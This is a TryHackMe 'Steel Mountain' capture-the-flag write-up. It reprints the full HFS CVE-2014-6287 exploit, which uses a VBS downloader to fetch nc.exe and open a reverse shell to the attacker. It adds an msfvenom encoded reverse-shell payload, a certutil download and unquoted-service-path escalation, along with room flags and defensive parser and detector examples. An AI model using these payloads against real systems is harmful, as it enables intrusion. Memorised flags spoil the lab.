
TryHackMe - Steel Mountain Writeup

tags: writeup tryhackme SteelMountain Easy

:computer: Port Scanning

First we run nmap against the IP. It shows several web servers and tells us the target is a Windows machine.

# Nmap 7.92 scan initiated Mon Mar 28 11:28:46 2022 as: nmap -sV -T4 -sS -v -p- -oN Ports 10.10.55.10
Increasing send delay for 10.10.55.10 from 0 to 5 due to 989 out of 2472 dropped probes since last increase.
Increasing send delay for 10.10.55.10 from 5 to 10 due to 11 out of 20 dropped probes since last increase.
Nmap scan report for 10.10.55.10
Host is up (0.14s latency).
Not shown: 65520 closed tcp ports (reset)
PORT      STATE SERVICE            VERSION
80/tcp    open  http               Microsoft IIS httpd 8.5
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp  open  ssl/ms-wbt-server?
5985/tcp  open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
8080/tcp  open  http               HttpFileServer httpd 2.3
47001/tcp open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49155/tcp open  msrpc              Microsoft Windows RPC
49156/tcp open  msrpc              Microsoft Windows RPC
49183/tcp open  msrpc              Microsoft Windows RPC
49184/tcp open  msrpc              Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Mar 28 11:45:37 2022 -- 1 IP address (1 host up) scanned in 1011.52 seconds

  • The web server on port 80 contains the information for some of the secondary flags.
  • The web server on port 8080 is the main path to the user flag and to root.
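As an added example (not part of the original writeup), here is a small parser for the nmap normal-output (-oN) format shown above. It pulls the port table into records and separates the Windows built-in HTTP listeners (IIS on 80, the HTTPAPI/WinRM listeners on 5985 and 47001) from third-party web servers, which is how the 8080 answer falls out of the scan rather than from eyeballing it. The sample text is a trimmed, constructed copy of the scan output.

```python
import re

# Constructed sample: a trimmed copy of the normal-format (-oN) nmap output above.
SAMPLE_NMAP = """\
# Nmap 7.92 scan initiated Mon Mar 28 11:28:46 2022 as: nmap -sV -T4 -sS -v -p- -oN Ports 10.10.55.10
Nmap scan report for 10.10.55.10
Host is up (0.14s latency).
Not shown: 65520 closed tcp ports (reset)
PORT      STATE SERVICE            VERSION
80/tcp    open  http               Microsoft IIS httpd 8.5
135/tcp   open  msrpc              Microsoft Windows RPC
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp  open  ssl/ms-wbt-server?
5985/tcp  open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
8080/tcp  open  http               HttpFileServer httpd 2.3
47001/tcp open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
"""

# One port-table row, e.g. "8080/tcp  open  http  HttpFileServer httpd 2.3"
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)\s*(?P<version>.*)$"
)


def parse_nmap_normal(text):
    """Turn the port table of nmap -oN output into a list of dicts."""
    records = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if not m:
            continue
        rec = m.groupdict()
        rec["port"] = int(rec["port"])
        rec["version"] = rec["version"].strip()
        # A trailing "?" means nmap guessed the service without a version match.
        rec["guessed"] = rec["service"].endswith("?")
        records.append(rec)
    return records


def web_servers(records):
    """Open ports nmap labelled http/https (including ssl/http wrappers)."""
    out = []
    for r in records:
        svc = r["service"].rstrip("?").split("/")[-1]
        if r["state"] == "open" and svc in ("http", "https"):
            out.append(r)
    return out


def non_standard_web_ports(records):
    """Web listeners on anything other than 80/443."""
    return sorted(r["port"] for r in web_servers(records) if r["port"] not in (80, 443))


def third_party_web(records):
    """Web listeners whose banner is not a Microsoft component (IIS, HTTPAPI/WinRM)."""
    return [r for r in web_servers(records) if not r["version"].startswith("Microsoft")]


if __name__ == "__main__":
    recs = parse_nmap_normal(SAMPLE_NMAP)
    print("web ports off 80/443:", non_standard_web_ports(recs))
    for r in third_party_web(recs):
        print("third-party web server: %d/%s %s" % (r["port"], r["proto"], r["version"]))
```

On the full scan the same filter leaves only 8080 as a third-party web server; 5985 and 47001 are the standard WinRM/HTTPAPI listeners and 3389 is flagged as guessed because nmap could not match a version.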

:eye: Enumeration

Source code

The first flag is hidden as a comment in the site hosted on port 80; open the site and press Ctrl+U to view the page source:

As the image shows, the photo's file name is Bill Harper. With that we know who the employee of the month is, and we have the first flag.

Bill Harper

Http File Server

Enumerating the site on port 80 further turns up nothing else, so it is time to move to the one on port 8080. There we find an HTTP File Server, and exploit-db has an RCE exploit for this web application.

To identify the exact program we can google it or click on the "httpfileserver 2.3" link, which redirects to the application's info page. Once we know the exact application, we can find it on exploit-db and start exploiting it.
With this we have three of the four flags in task 2.

Scan the machine with nmap. What is the other port running a web server on?

8080

Take a look at the other web server. What file server is running?

Rejetto HTTP File Server

What is the CVE number to exploit this file server?

2014-6287

:bomb: Exploitation

This is the exploit:
https://www.exploit-db.com/exploits/39161

:mag: Understanding the exploit:

This exploit works in a curious way.
First it retrieves a netcat binary from a web server. You have to edit the script to set your IP address and local port, and start the web server in the same directory where the compiled netcat binary is located.

#!/usr/bin/python
# Exploit Title: HttpFileServer 2.3.x Remote Command Execution
# Google Dork: intext:"httpfileserver 2.3"
# Date: 04-01-2016
# Remote: Yes
# Exploit Author: Avinash Kumar Thapa aka "-Acid"
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287
# Description: You can use HFS (HTTP File Server) to send and receive files.
#	       It's different from classic file sharing because it uses web technology to be more compatible with today's Internet.
#	       It also differs from classic web servers because it's very easy to use and runs "right out-of-the box". Access your remote files, over the network. It has been successfully tested with Wine under Linux. 
 
#Usage : python Exploit.py <Target IP address> <Target Port Number>

#EDB Note: You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe).  
#          You may need to run it multiple times for success!


import urllib2
import sys

try:
	def script_create():
		urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+save+".}")

	def execute_script():
		urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe+".}")

	def nc_run():
		urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe1+".}")

	ip_addr = "10.10.10.10" #local IP address
	local_port = "443" # Local Port number
	vbs = "C:\Users\Public\script.vbs|dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F"+ip_addr+"%2Fnc.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20.open%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20.savetofile%20%22C%3A%5CUsers%5CPublic%5Cnc.exe%22%2C%202%20%27%2F%2Foverwrite%0D%0Aend%20with"
	save= "save|" + vbs
	vbs2 = "cscript.exe%20C%3A%5CUsers%5CPublic%5Cscript.vbs"
	exe= "exec|"+vbs2
	vbs3 = "C%3A%5CUsers%5CPublic%5Cnc.exe%20-e%20cmd.exe%20"+ip_addr+"%20"+local_port
	exe1= "exec|"+vbs3
	script_create()
	execute_script()
	nc_run()
except:
	print """[.]Something went wrong..!
	Usage is :[.] python exploit.py <Target IP address>  <Target Port Number>
	Don't forgot to change the Local IP address and Port number on the script"""
	

With the exploit downloaded and the IP and port changed, we need to download a static netcat binary from GitHub:

In this case we use this file, but any static netcat binary will do.

After downloading it we set up a local web server in the directory we downloaded it to. This can be done with PHP or other languages, but this time I'm going to use python3.

python3 -m http.server 8080

As noted above, on the first run the exploit downloads the netcat binary to the target machine, and on the second run we receive a shell at the IP we entered.

To receive it we close the HTTP server and set up a netcat listener on our machine.
After running the exploit twice we get a shell on the target.
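The detection side of the same vulnerability, as an added example that is not part of the original writeup: the exploit above abuses HFS's template macro syntax ({.command|argument.}) by prefixing the search parameter with a %00 null byte, which defeats the server's macro-marker check. The function below scans web-server log lines for that combination and reports the macro command used. The log lines are constructed samples in the common combined log format, with backslashes percent-encoded as %5C; the request shapes on lines 2 and 3 mirror the "save" and "exec" requests the exploit sends.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample log lines (combined log format), not from the room.
# Lines 2 and 3 mirror the two request shapes the exploit sends: a "save"
# macro that writes a file and an "exec" macro that runs it.
SAMPLE_LOG = [
    '10.10.10.11 - - [28/Mar/2022:11:50:01 +0000] "GET /?search=report HTTP/1.1" 200 512',
    '10.10.10.11 - - [28/Mar/2022:11:50:09 +0000] "GET /?search=%00{.+save|C:%5CUsers%5CPublic%5Cscript.vbs|dim%20xHttp.} HTTP/1.1" 200 512',
    '10.10.10.11 - - [28/Mar/2022:11:50:15 +0000] "GET /?search=%00{.+exec|cscript.exe%20C:%5CUsers%5CPublic%5Cscript.vbs.} HTTP/1.1" 200 512',
    '10.10.10.12 - - [28/Mar/2022:11:51:00 +0000] "GET /?search={.} HTTP/1.1" 200 512',
]

# The quoted request line: method, target, protocol.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/\d\.\d"')
# HFS macro marker: "{." then a command word then "|".  The exploit writes
# "{.+save" and the "+" decodes to a space, so whitespace is allowed here.
HFS_MACRO = re.compile(r"\{\.\s*(?P<cmd>[A-Za-z]+)\s*\|")


def classify_request(line):
    """Return (verdict, macro_command) for one log line, or None if nothing stands out."""
    m = REQUEST.search(line)
    if not m:
        return None
    target = m.group("target")
    query = target.partition("?")[2]
    decoded = unquote_plus(query)          # %00 -> NUL, %5C -> backslash, + -> space
    has_null = "\x00" in decoded
    macro = HFS_MACRO.search(decoded)
    if macro and has_null:
        return ("hfs-macro-injection", macro.group("cmd").lower())
    if macro:
        return ("hfs-macro-syntax", macro.group("cmd").lower())
    if has_null:
        return ("null-byte-in-query", None)
    return None


def scan_log(lines):
    """List of (1-based line number, verdict, macro command) for every flagged line."""
    hits = []
    for n, line in enumerate(lines, 1):
        verdict = classify_request(line)
        if verdict:
            hits.append((n, verdict[0], verdict[1]))
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

A null byte in a search query has no legitimate use, so the "hfs-macro-injection" verdict can be alerted on directly; the weaker "hfs-macro-syntax" verdict is worth a look but may be noisy on sites that let users type braces. The actual fix is the vendor's: the CVE record lists HFS 2.3x before 2.3c as affected.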

If we go to Bill's Desktop we can see the flag:

With this we have the last question of task 2:

b04763b6fcf51fcd7c13abc7db4fd365

It's time to privesc!

:ladder: ROOT PRIVESC

If we have no idea where to start, we can run winpeas.bat.

In this case the room tells us it is an Unquoted Service Path vulnerability.
To enumerate the services we use one of these two commands:

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """
wmic service get name,displayname,pathname,startmode | findstr /i /v "C:\\Windows\\system32\\" |findstr /i /v """

To exploit this vulnerability we need to understand how Windows searches for the executable of a service whose path is not quoted. With that understood, we can see that AdvancedSystemCareService9 has no quotes around its path, so it is an exploitable service.
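As an added example rather than the room's material, the audit function below takes wmic-style service output and, for every unquoted image path that contains spaces, lists the executables Windows would look for before the intended one (each space-delimited prefix of the path with ".exe" appended). That is the search behaviour the paragraph refers to, and the resulting list is exactly the set of locations an administrator has to keep non-writable. The sample rows are constructed; the IObit image path is an assumption modelled on the service name, since the writeup does not print the real PathName. The example also produces the quoted path that fixes the service.

```python
import re

# Constructed sample in the layout of
#   wmic service get name,displayname,pathname,startmode
# (columns separated by two or more spaces).  The IObit path is an ASSUMPTION
# modelled on the service name in the room; the other rows are typical entries.
SAMPLE_WMIC = r"""
Name                        DisplayName                    PathName                                                            StartMode
AdvancedSystemCareService9  Advanced SystemCare Service 9  C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe     Auto
Spooler                     Print Spooler                  C:\Windows\System32\spoolsv.exe                                     Auto
GoodSvc                     Good Vendor Service            "C:\Program Files\Good Vendor\svc.exe" --run                        Auto
"""

ROW = re.compile(r"^(?P<name>\S+)\s{2,}(?P<display>.+?)\s{2,}(?P<path>.+?)\s{2,}(?P<mode>\S+)\s*$")
EXE = re.compile(r"(?i)^(?P<exe>.+?\.exe)(?P<args>.*)$")


def parse_wmic(text):
    """Rows of the wmic table as dicts (name, display, path, mode), header skipped."""
    services = []
    for line in text.splitlines():
        m = ROW.match(line)
        if not m or m.group("name") == "Name":
            continue
        services.append(m.groupdict())
    return services


def unquoted_path_candidates(pathname):
    """For an unquoted image path containing spaces, return the executables Windows
    tries before the real one: each space-delimited prefix with ".exe" appended.
    Quoted paths and paths without spaces are unambiguous and return []."""
    p = pathname.strip()
    if p.startswith('"'):
        return []
    m = EXE.match(p)
    exe = m.group("exe") if m else p        # ignore arguments after the executable
    if " " not in exe:
        return []
    parts = exe.split(" ")
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]


def quoted_fix(pathname):
    """The corrected PathName: executable wrapped in quotes, arguments left as they were."""
    p = pathname.strip()
    if p.startswith('"'):
        return p
    m = EXE.match(p)
    if not m:
        return '"%s"' % p
    return '"%s"%s' % (m.group("exe"), m.group("args"))


def audit(text):
    """(service name, paths Windows would search first) for each unquoted, spaced path."""
    findings = []
    for svc in parse_wmic(text):
        candidates = unquoted_path_candidates(svc["path"])
        if candidates:
            findings.append((svc["name"], candidates))
    return findings


if __name__ == "__main__":
    for name, candidates in audit(SAMPLE_WMIC):
        print(name)
        for c in candidates:
            print("   would be tried first:", c)
```

For the assumed IObit path the third candidate is C:\Program Files (x86)\IObit\Advanced.exe, which is why the writeup drops a file named Advanced.exe into that directory. On a real host the remediation is to quote the path (sc config <service> binPath= with the quoted value, or the ImagePath value under the service's registry key) and to check with icacls that unprivileged users cannot write to any directory on the candidate list.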

Now we have to generate the payload and upload it to the right directory on the machine. We have to go to:

C:\Program Files (x86)\IObit\

and download it there with certutil. But first, generate the payload and start the web server with python:

  • To generate the payload we use msfvenom:
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.66.103 LPORT=80 -e x86/shikata_ga_nai -f exe -o Advanced.exe
  • Then start the web server:
python3 -m http.server 8080
  • Download the file onto the target machine with certutil:
certutil -urlcache -f http://10.10.10.10:8080/Advanced.exe Advanced.exe

After that we start an nc listener on the port we configured in the payload (80 in this case), and then we have to restart the service. To do so we use the following commands:

sc stop AdvancedSystemCareService9

sc start AdvancedSystemCareService9

After executing those commands we receive a SYSTEM shell on our nc listener and can read the root flag.

The root flag is:

9af5f314f57607c00fd09803a587db80
